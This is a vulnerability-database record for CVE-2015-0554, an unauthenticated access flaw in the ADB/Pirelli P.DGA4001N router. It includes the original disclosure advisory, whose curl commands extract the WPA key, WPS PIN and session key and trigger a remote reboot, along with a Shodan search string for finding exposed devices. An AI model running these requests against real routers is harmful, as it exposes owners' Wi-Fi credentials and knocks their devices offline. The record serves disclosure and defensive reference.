VAR-201501-0227
Vulnerability from variot - Updated: 2024-02-13 22:34The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. ADB (formerly known as Pirelli Broadband Solutions) P.DGA4001N is an ADSL wireless router product from ADB, Switzerland. ADB P.DGA4001N router has a security vulnerability. The program failed to properly restrict access to the web interface. Successful exploits may allow an attacker to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks. ADB P.DGA4001N Router running firmware PDG_TEF_SP_4.06L.6 is vulnerable; other versions may also be affected. - Title:
CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure HomeStation Movistar
- Author:
Eduardo Novella @enovella_ ednolo[@]inf.upv[dot]es
- Version:
Tested on firmware version PDG_TEF_SP_4.06L.6
-
Shodan dork :
- "Dropbear 0.46 country:es" ( From now on it looks like not working on this way)
-
Summary:
HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information.
- The vulnerability and the way to exploit it:
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_" WLAN_DEAD
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey" var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin" var WscDevPin = '12820078';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey" var sessionKey='1189641421';
$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3 BSSID: DC:0B:1A:XX:XX:XX
Rebooting the router remotely and provoking a Denial of Service
-----------------------------------------------------------------
http://${IP_ADDRESS}/resetrouter.html
We can observe at the source:
http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123
All the information what we can fetch from.
----------------------------------------------
webs$ ls adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html certadd.html footer.html logo.html routeadd.html stylemain.css certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html colors.css hlppppoeconn.html natcfg2.html scripts util.js config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html css hlptstdns.html omcidownload.html seclogintro.html wancfg.html ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html diag.html images pppoe.html statsadslerr.html wlsecurity.html diagipow.html index.html pradd.html statsadsl.html wlsetup.html diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html diagpppoa.html ippcfg.html pwrmngt.html statsatm.html
-
Conclusion:
This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network or even worse being a member of a botnet without knowledge of it. First mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them.
-
References:
http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html
- Timeline:
2013-04-xx Send email to Movistar and Pirelli 2015-01-05 Full disclosure
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201501-0227",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "p.dga4001n",
"scope": "eq",
"trust": 1.6,
"vendor": "adb",
"version": "pdg_tef_sp_4.06l.6"
},
{
"model": "p.dga4001n",
"scope": null,
"trust": 0.8,
"vendor": "adb sa",
"version": null
},
{
"model": "p.dga4001n",
"scope": "eq",
"trust": 0.8,
"vendor": "adb sa",
"version": "pdg_tef_sp_4.06l.6"
},
{
"model": "p.dga4001n router pdg tef sp 4.06l.6",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
},
{
"model": "p.dga4001n pdg tef sp 4.06l.6",
"scope": null,
"trust": 0.3,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adb:p.dga4001n:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported these issues.",
"sources": [
{
"db": "BID",
"id": "72705"
}
],
"trust": 0.3
},
"cve": "CVE-2015-0554",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.4,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 9.2,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.4,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2015-0554",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.4,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-00657",
"impactScore": 9.2,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.4,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-78500",
"impactScore": 9.2,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-0554",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2015-00657",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201501-529",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-78500",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2015-0554",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. ADB (formerly known as Pirelli Broadband Solutions) P.DGA4001N is an ADSL wireless router product from ADB, Switzerland. ADB P.DGA4001N router has a security vulnerability. The program failed to properly restrict access to the web interface. \nSuccessful exploits may allow an attacker to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks. \nADB P.DGA4001N Router running firmware PDG_TEF_SP_4.06L.6 is vulnerable; other versions may also be affected. - Title:\n\nCVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure \nHomeStation Movistar\n\n- Author:\n\nEduardo Novella @enovella_\nednolo[@]inf.upv[dot]es\n\n- Version:\n\nTested on firmware version PDG_TEF_SP_4.06L.6\n\n\n- Shodan dork : \n\t+ \"Dropbear 0.46 country:es\" ( From now on it looks like not working on this way)\n\n\n- Summary:\n\nHomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any \nIP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information. \n\n\n- The vulnerability and the way to exploit it:\n\n\n$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i \"WLAN_\"\n \u003coption value=\u00270\u0027\u003eWLAN_DEAD\u003c/option\u003e\n\n$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i \"var wpapskkey\"\nvar wpaPskKey = \u0027IsAklFHhFFui1sr9ZMqD\u0027;\n\n$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i \"var WscDevPin\"\nvar WscDevPin = \u002712820078\u0027;\n\n$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i \"var sessionkey\"\nvar sessionKey=\u00271189641421\u0027;\n\n$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i \"bssid:\" -A 3\n \u003ctd width=\"50\"\u003eBSSID:\u003c/td\u003e\n \u003ctd\u003e\n DC:0B:1A:XX:XX:XX\n \u003c/td\u003e\n\n\n\n# Rebooting the router remotely and provoking a Denial of Service\n#-----------------------------------------------------------------\nhttp://${IP_ADDRESS}/resetrouter.html\n\nWe can observe at the source:\n\u003c!-- hide\n\nvar sessionKey=\u0027846930886\u0027;\nfunction btnReset() {\n var loc = \u0027rebootinfo.cgi?\u0027;\n\n loc += \u0027sessionKey=\u0027 + sessionKey;\n\n var code = \u0027location=\"\u0027 + loc + \u0027\"\u0027;\n eval(code);\n}\n\n// done hiding --\u003e\n\n\nhttp://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123\n\n\n# All the information what we can fetch from. \n#----------------------------------------------\nwebs$ ls\nadslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html\nadslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html\nadslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html\nadslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html\nalgcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html\nAPIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html\natmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html\nbackupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html\nberrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html\nberstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html\nberstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html\ncertadd.html footer.html logo.html routeadd.html stylemain.css\ncertcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html\ncertimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html\ncertloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html\ncfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html\ncfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html\ncfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html\ncfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html\ncfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html\ncolors.css hlppppoeconn.html natcfg2.html scripts util.js\nconfig.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html\ncss hlptstdns.html omcidownload.html seclogintro.html wancfg.html\nddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html\ndefaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html\ndhcpinfo.html html portmapadd.html standby.html wlcfgkey.html\ndiag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html\ndiagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html\ndiag.html images pppoe.html statsadslerr.html wlsecurity.html\ndiagipow.html index.html pradd.html statsadsl.html wlsetup.html\ndiaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html\ndiagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html\ndiagpppoa.html ippcfg.html pwrmngt.html statsatm.html\n\n\n\n+ Conclusion:\n\n\tThis vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network\n or even worse being a member of a botnet without knowledge of it. \n\tFirst mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them. \n \n\n\n+ References:\n\nhttp://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html\n\n\n\n+ Timeline:\n\n2013-04-xx Send email to Movistar and Pirelli\n2015-01-05 Full disclosure \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-0554"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "PACKETSTORM",
"id": "129828"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-78500",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=35721",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-0554",
"trust": 3.6
},
{
"db": "PACKETSTORM",
"id": "129828",
"trust": 3.3
},
{
"db": "EXPLOIT-DB",
"id": "35721",
"trust": 2.4
},
{
"db": "BID",
"id": "72705",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "35721",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-00657",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-78500",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2015-0554",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "PACKETSTORM",
"id": "129828"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"id": "VAR-201501-0227",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
}
]
},
"last_update_date": "2024-02-13T22:34:44.864000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://broadband.adbglobal.com/"
},
{
"title": "Kenzer Templates [5170] [DEPRECATED]",
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "http://packetstormsecurity.com/files/129828/pirelli-adsl2-2-wireless-router-p.dga4001n-information-disclosure.html"
},
{
"trust": 2.4,
"url": "http://www.exploit-db.com/exploits/35721"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0554"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0554"
},
{
"trust": 0.3,
"url": "http://broadband.adbglobal.com/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/264.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/35721/"
},
{
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates"
},
{
"trust": 0.1,
"url": "http://${ip_address}/resetrouter.html"
},
{
"trust": 0.1,
"url": "http://${ip_address}/rebootinfo.cgi?sessionkey=233665123"
},
{
"trust": 0.1,
"url": "http://${ip_address}/wlsecurity.html"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/115663/alpha-networks-adsl2-2-wireless-router-asl-26555-password-disclosure.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-0554"
},
{
"trust": 0.1,
"url": "http://${ip_address}/wlcfg.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "PACKETSTORM",
"id": "129828"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "PACKETSTORM",
"id": "129828"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-01-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"date": "2015-01-21T00:00:00",
"db": "VULHUB",
"id": "VHN-78500"
},
{
"date": "2015-01-21T00:00:00",
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"date": "2015-02-21T00:00:00",
"db": "BID",
"id": "72705"
},
{
"date": "2015-01-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"date": "2015-01-06T23:51:58",
"db": "PACKETSTORM",
"id": "129828"
},
{
"date": "2015-01-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"date": "2015-01-21T18:59:50.917000",
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-01-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"date": "2015-01-23T00:00:00",
"db": "VULHUB",
"id": "VHN-78500"
},
{
"date": "2015-01-23T00:00:00",
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"date": "2015-02-21T00:00:00",
"db": "BID",
"id": "72705"
},
{
"date": "2015-01-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"date": "2015-01-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"date": "2015-01-23T20:43:03.387000",
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "129828"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ADB P.DGA4001N Vulnerability in obtaining important information in router firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.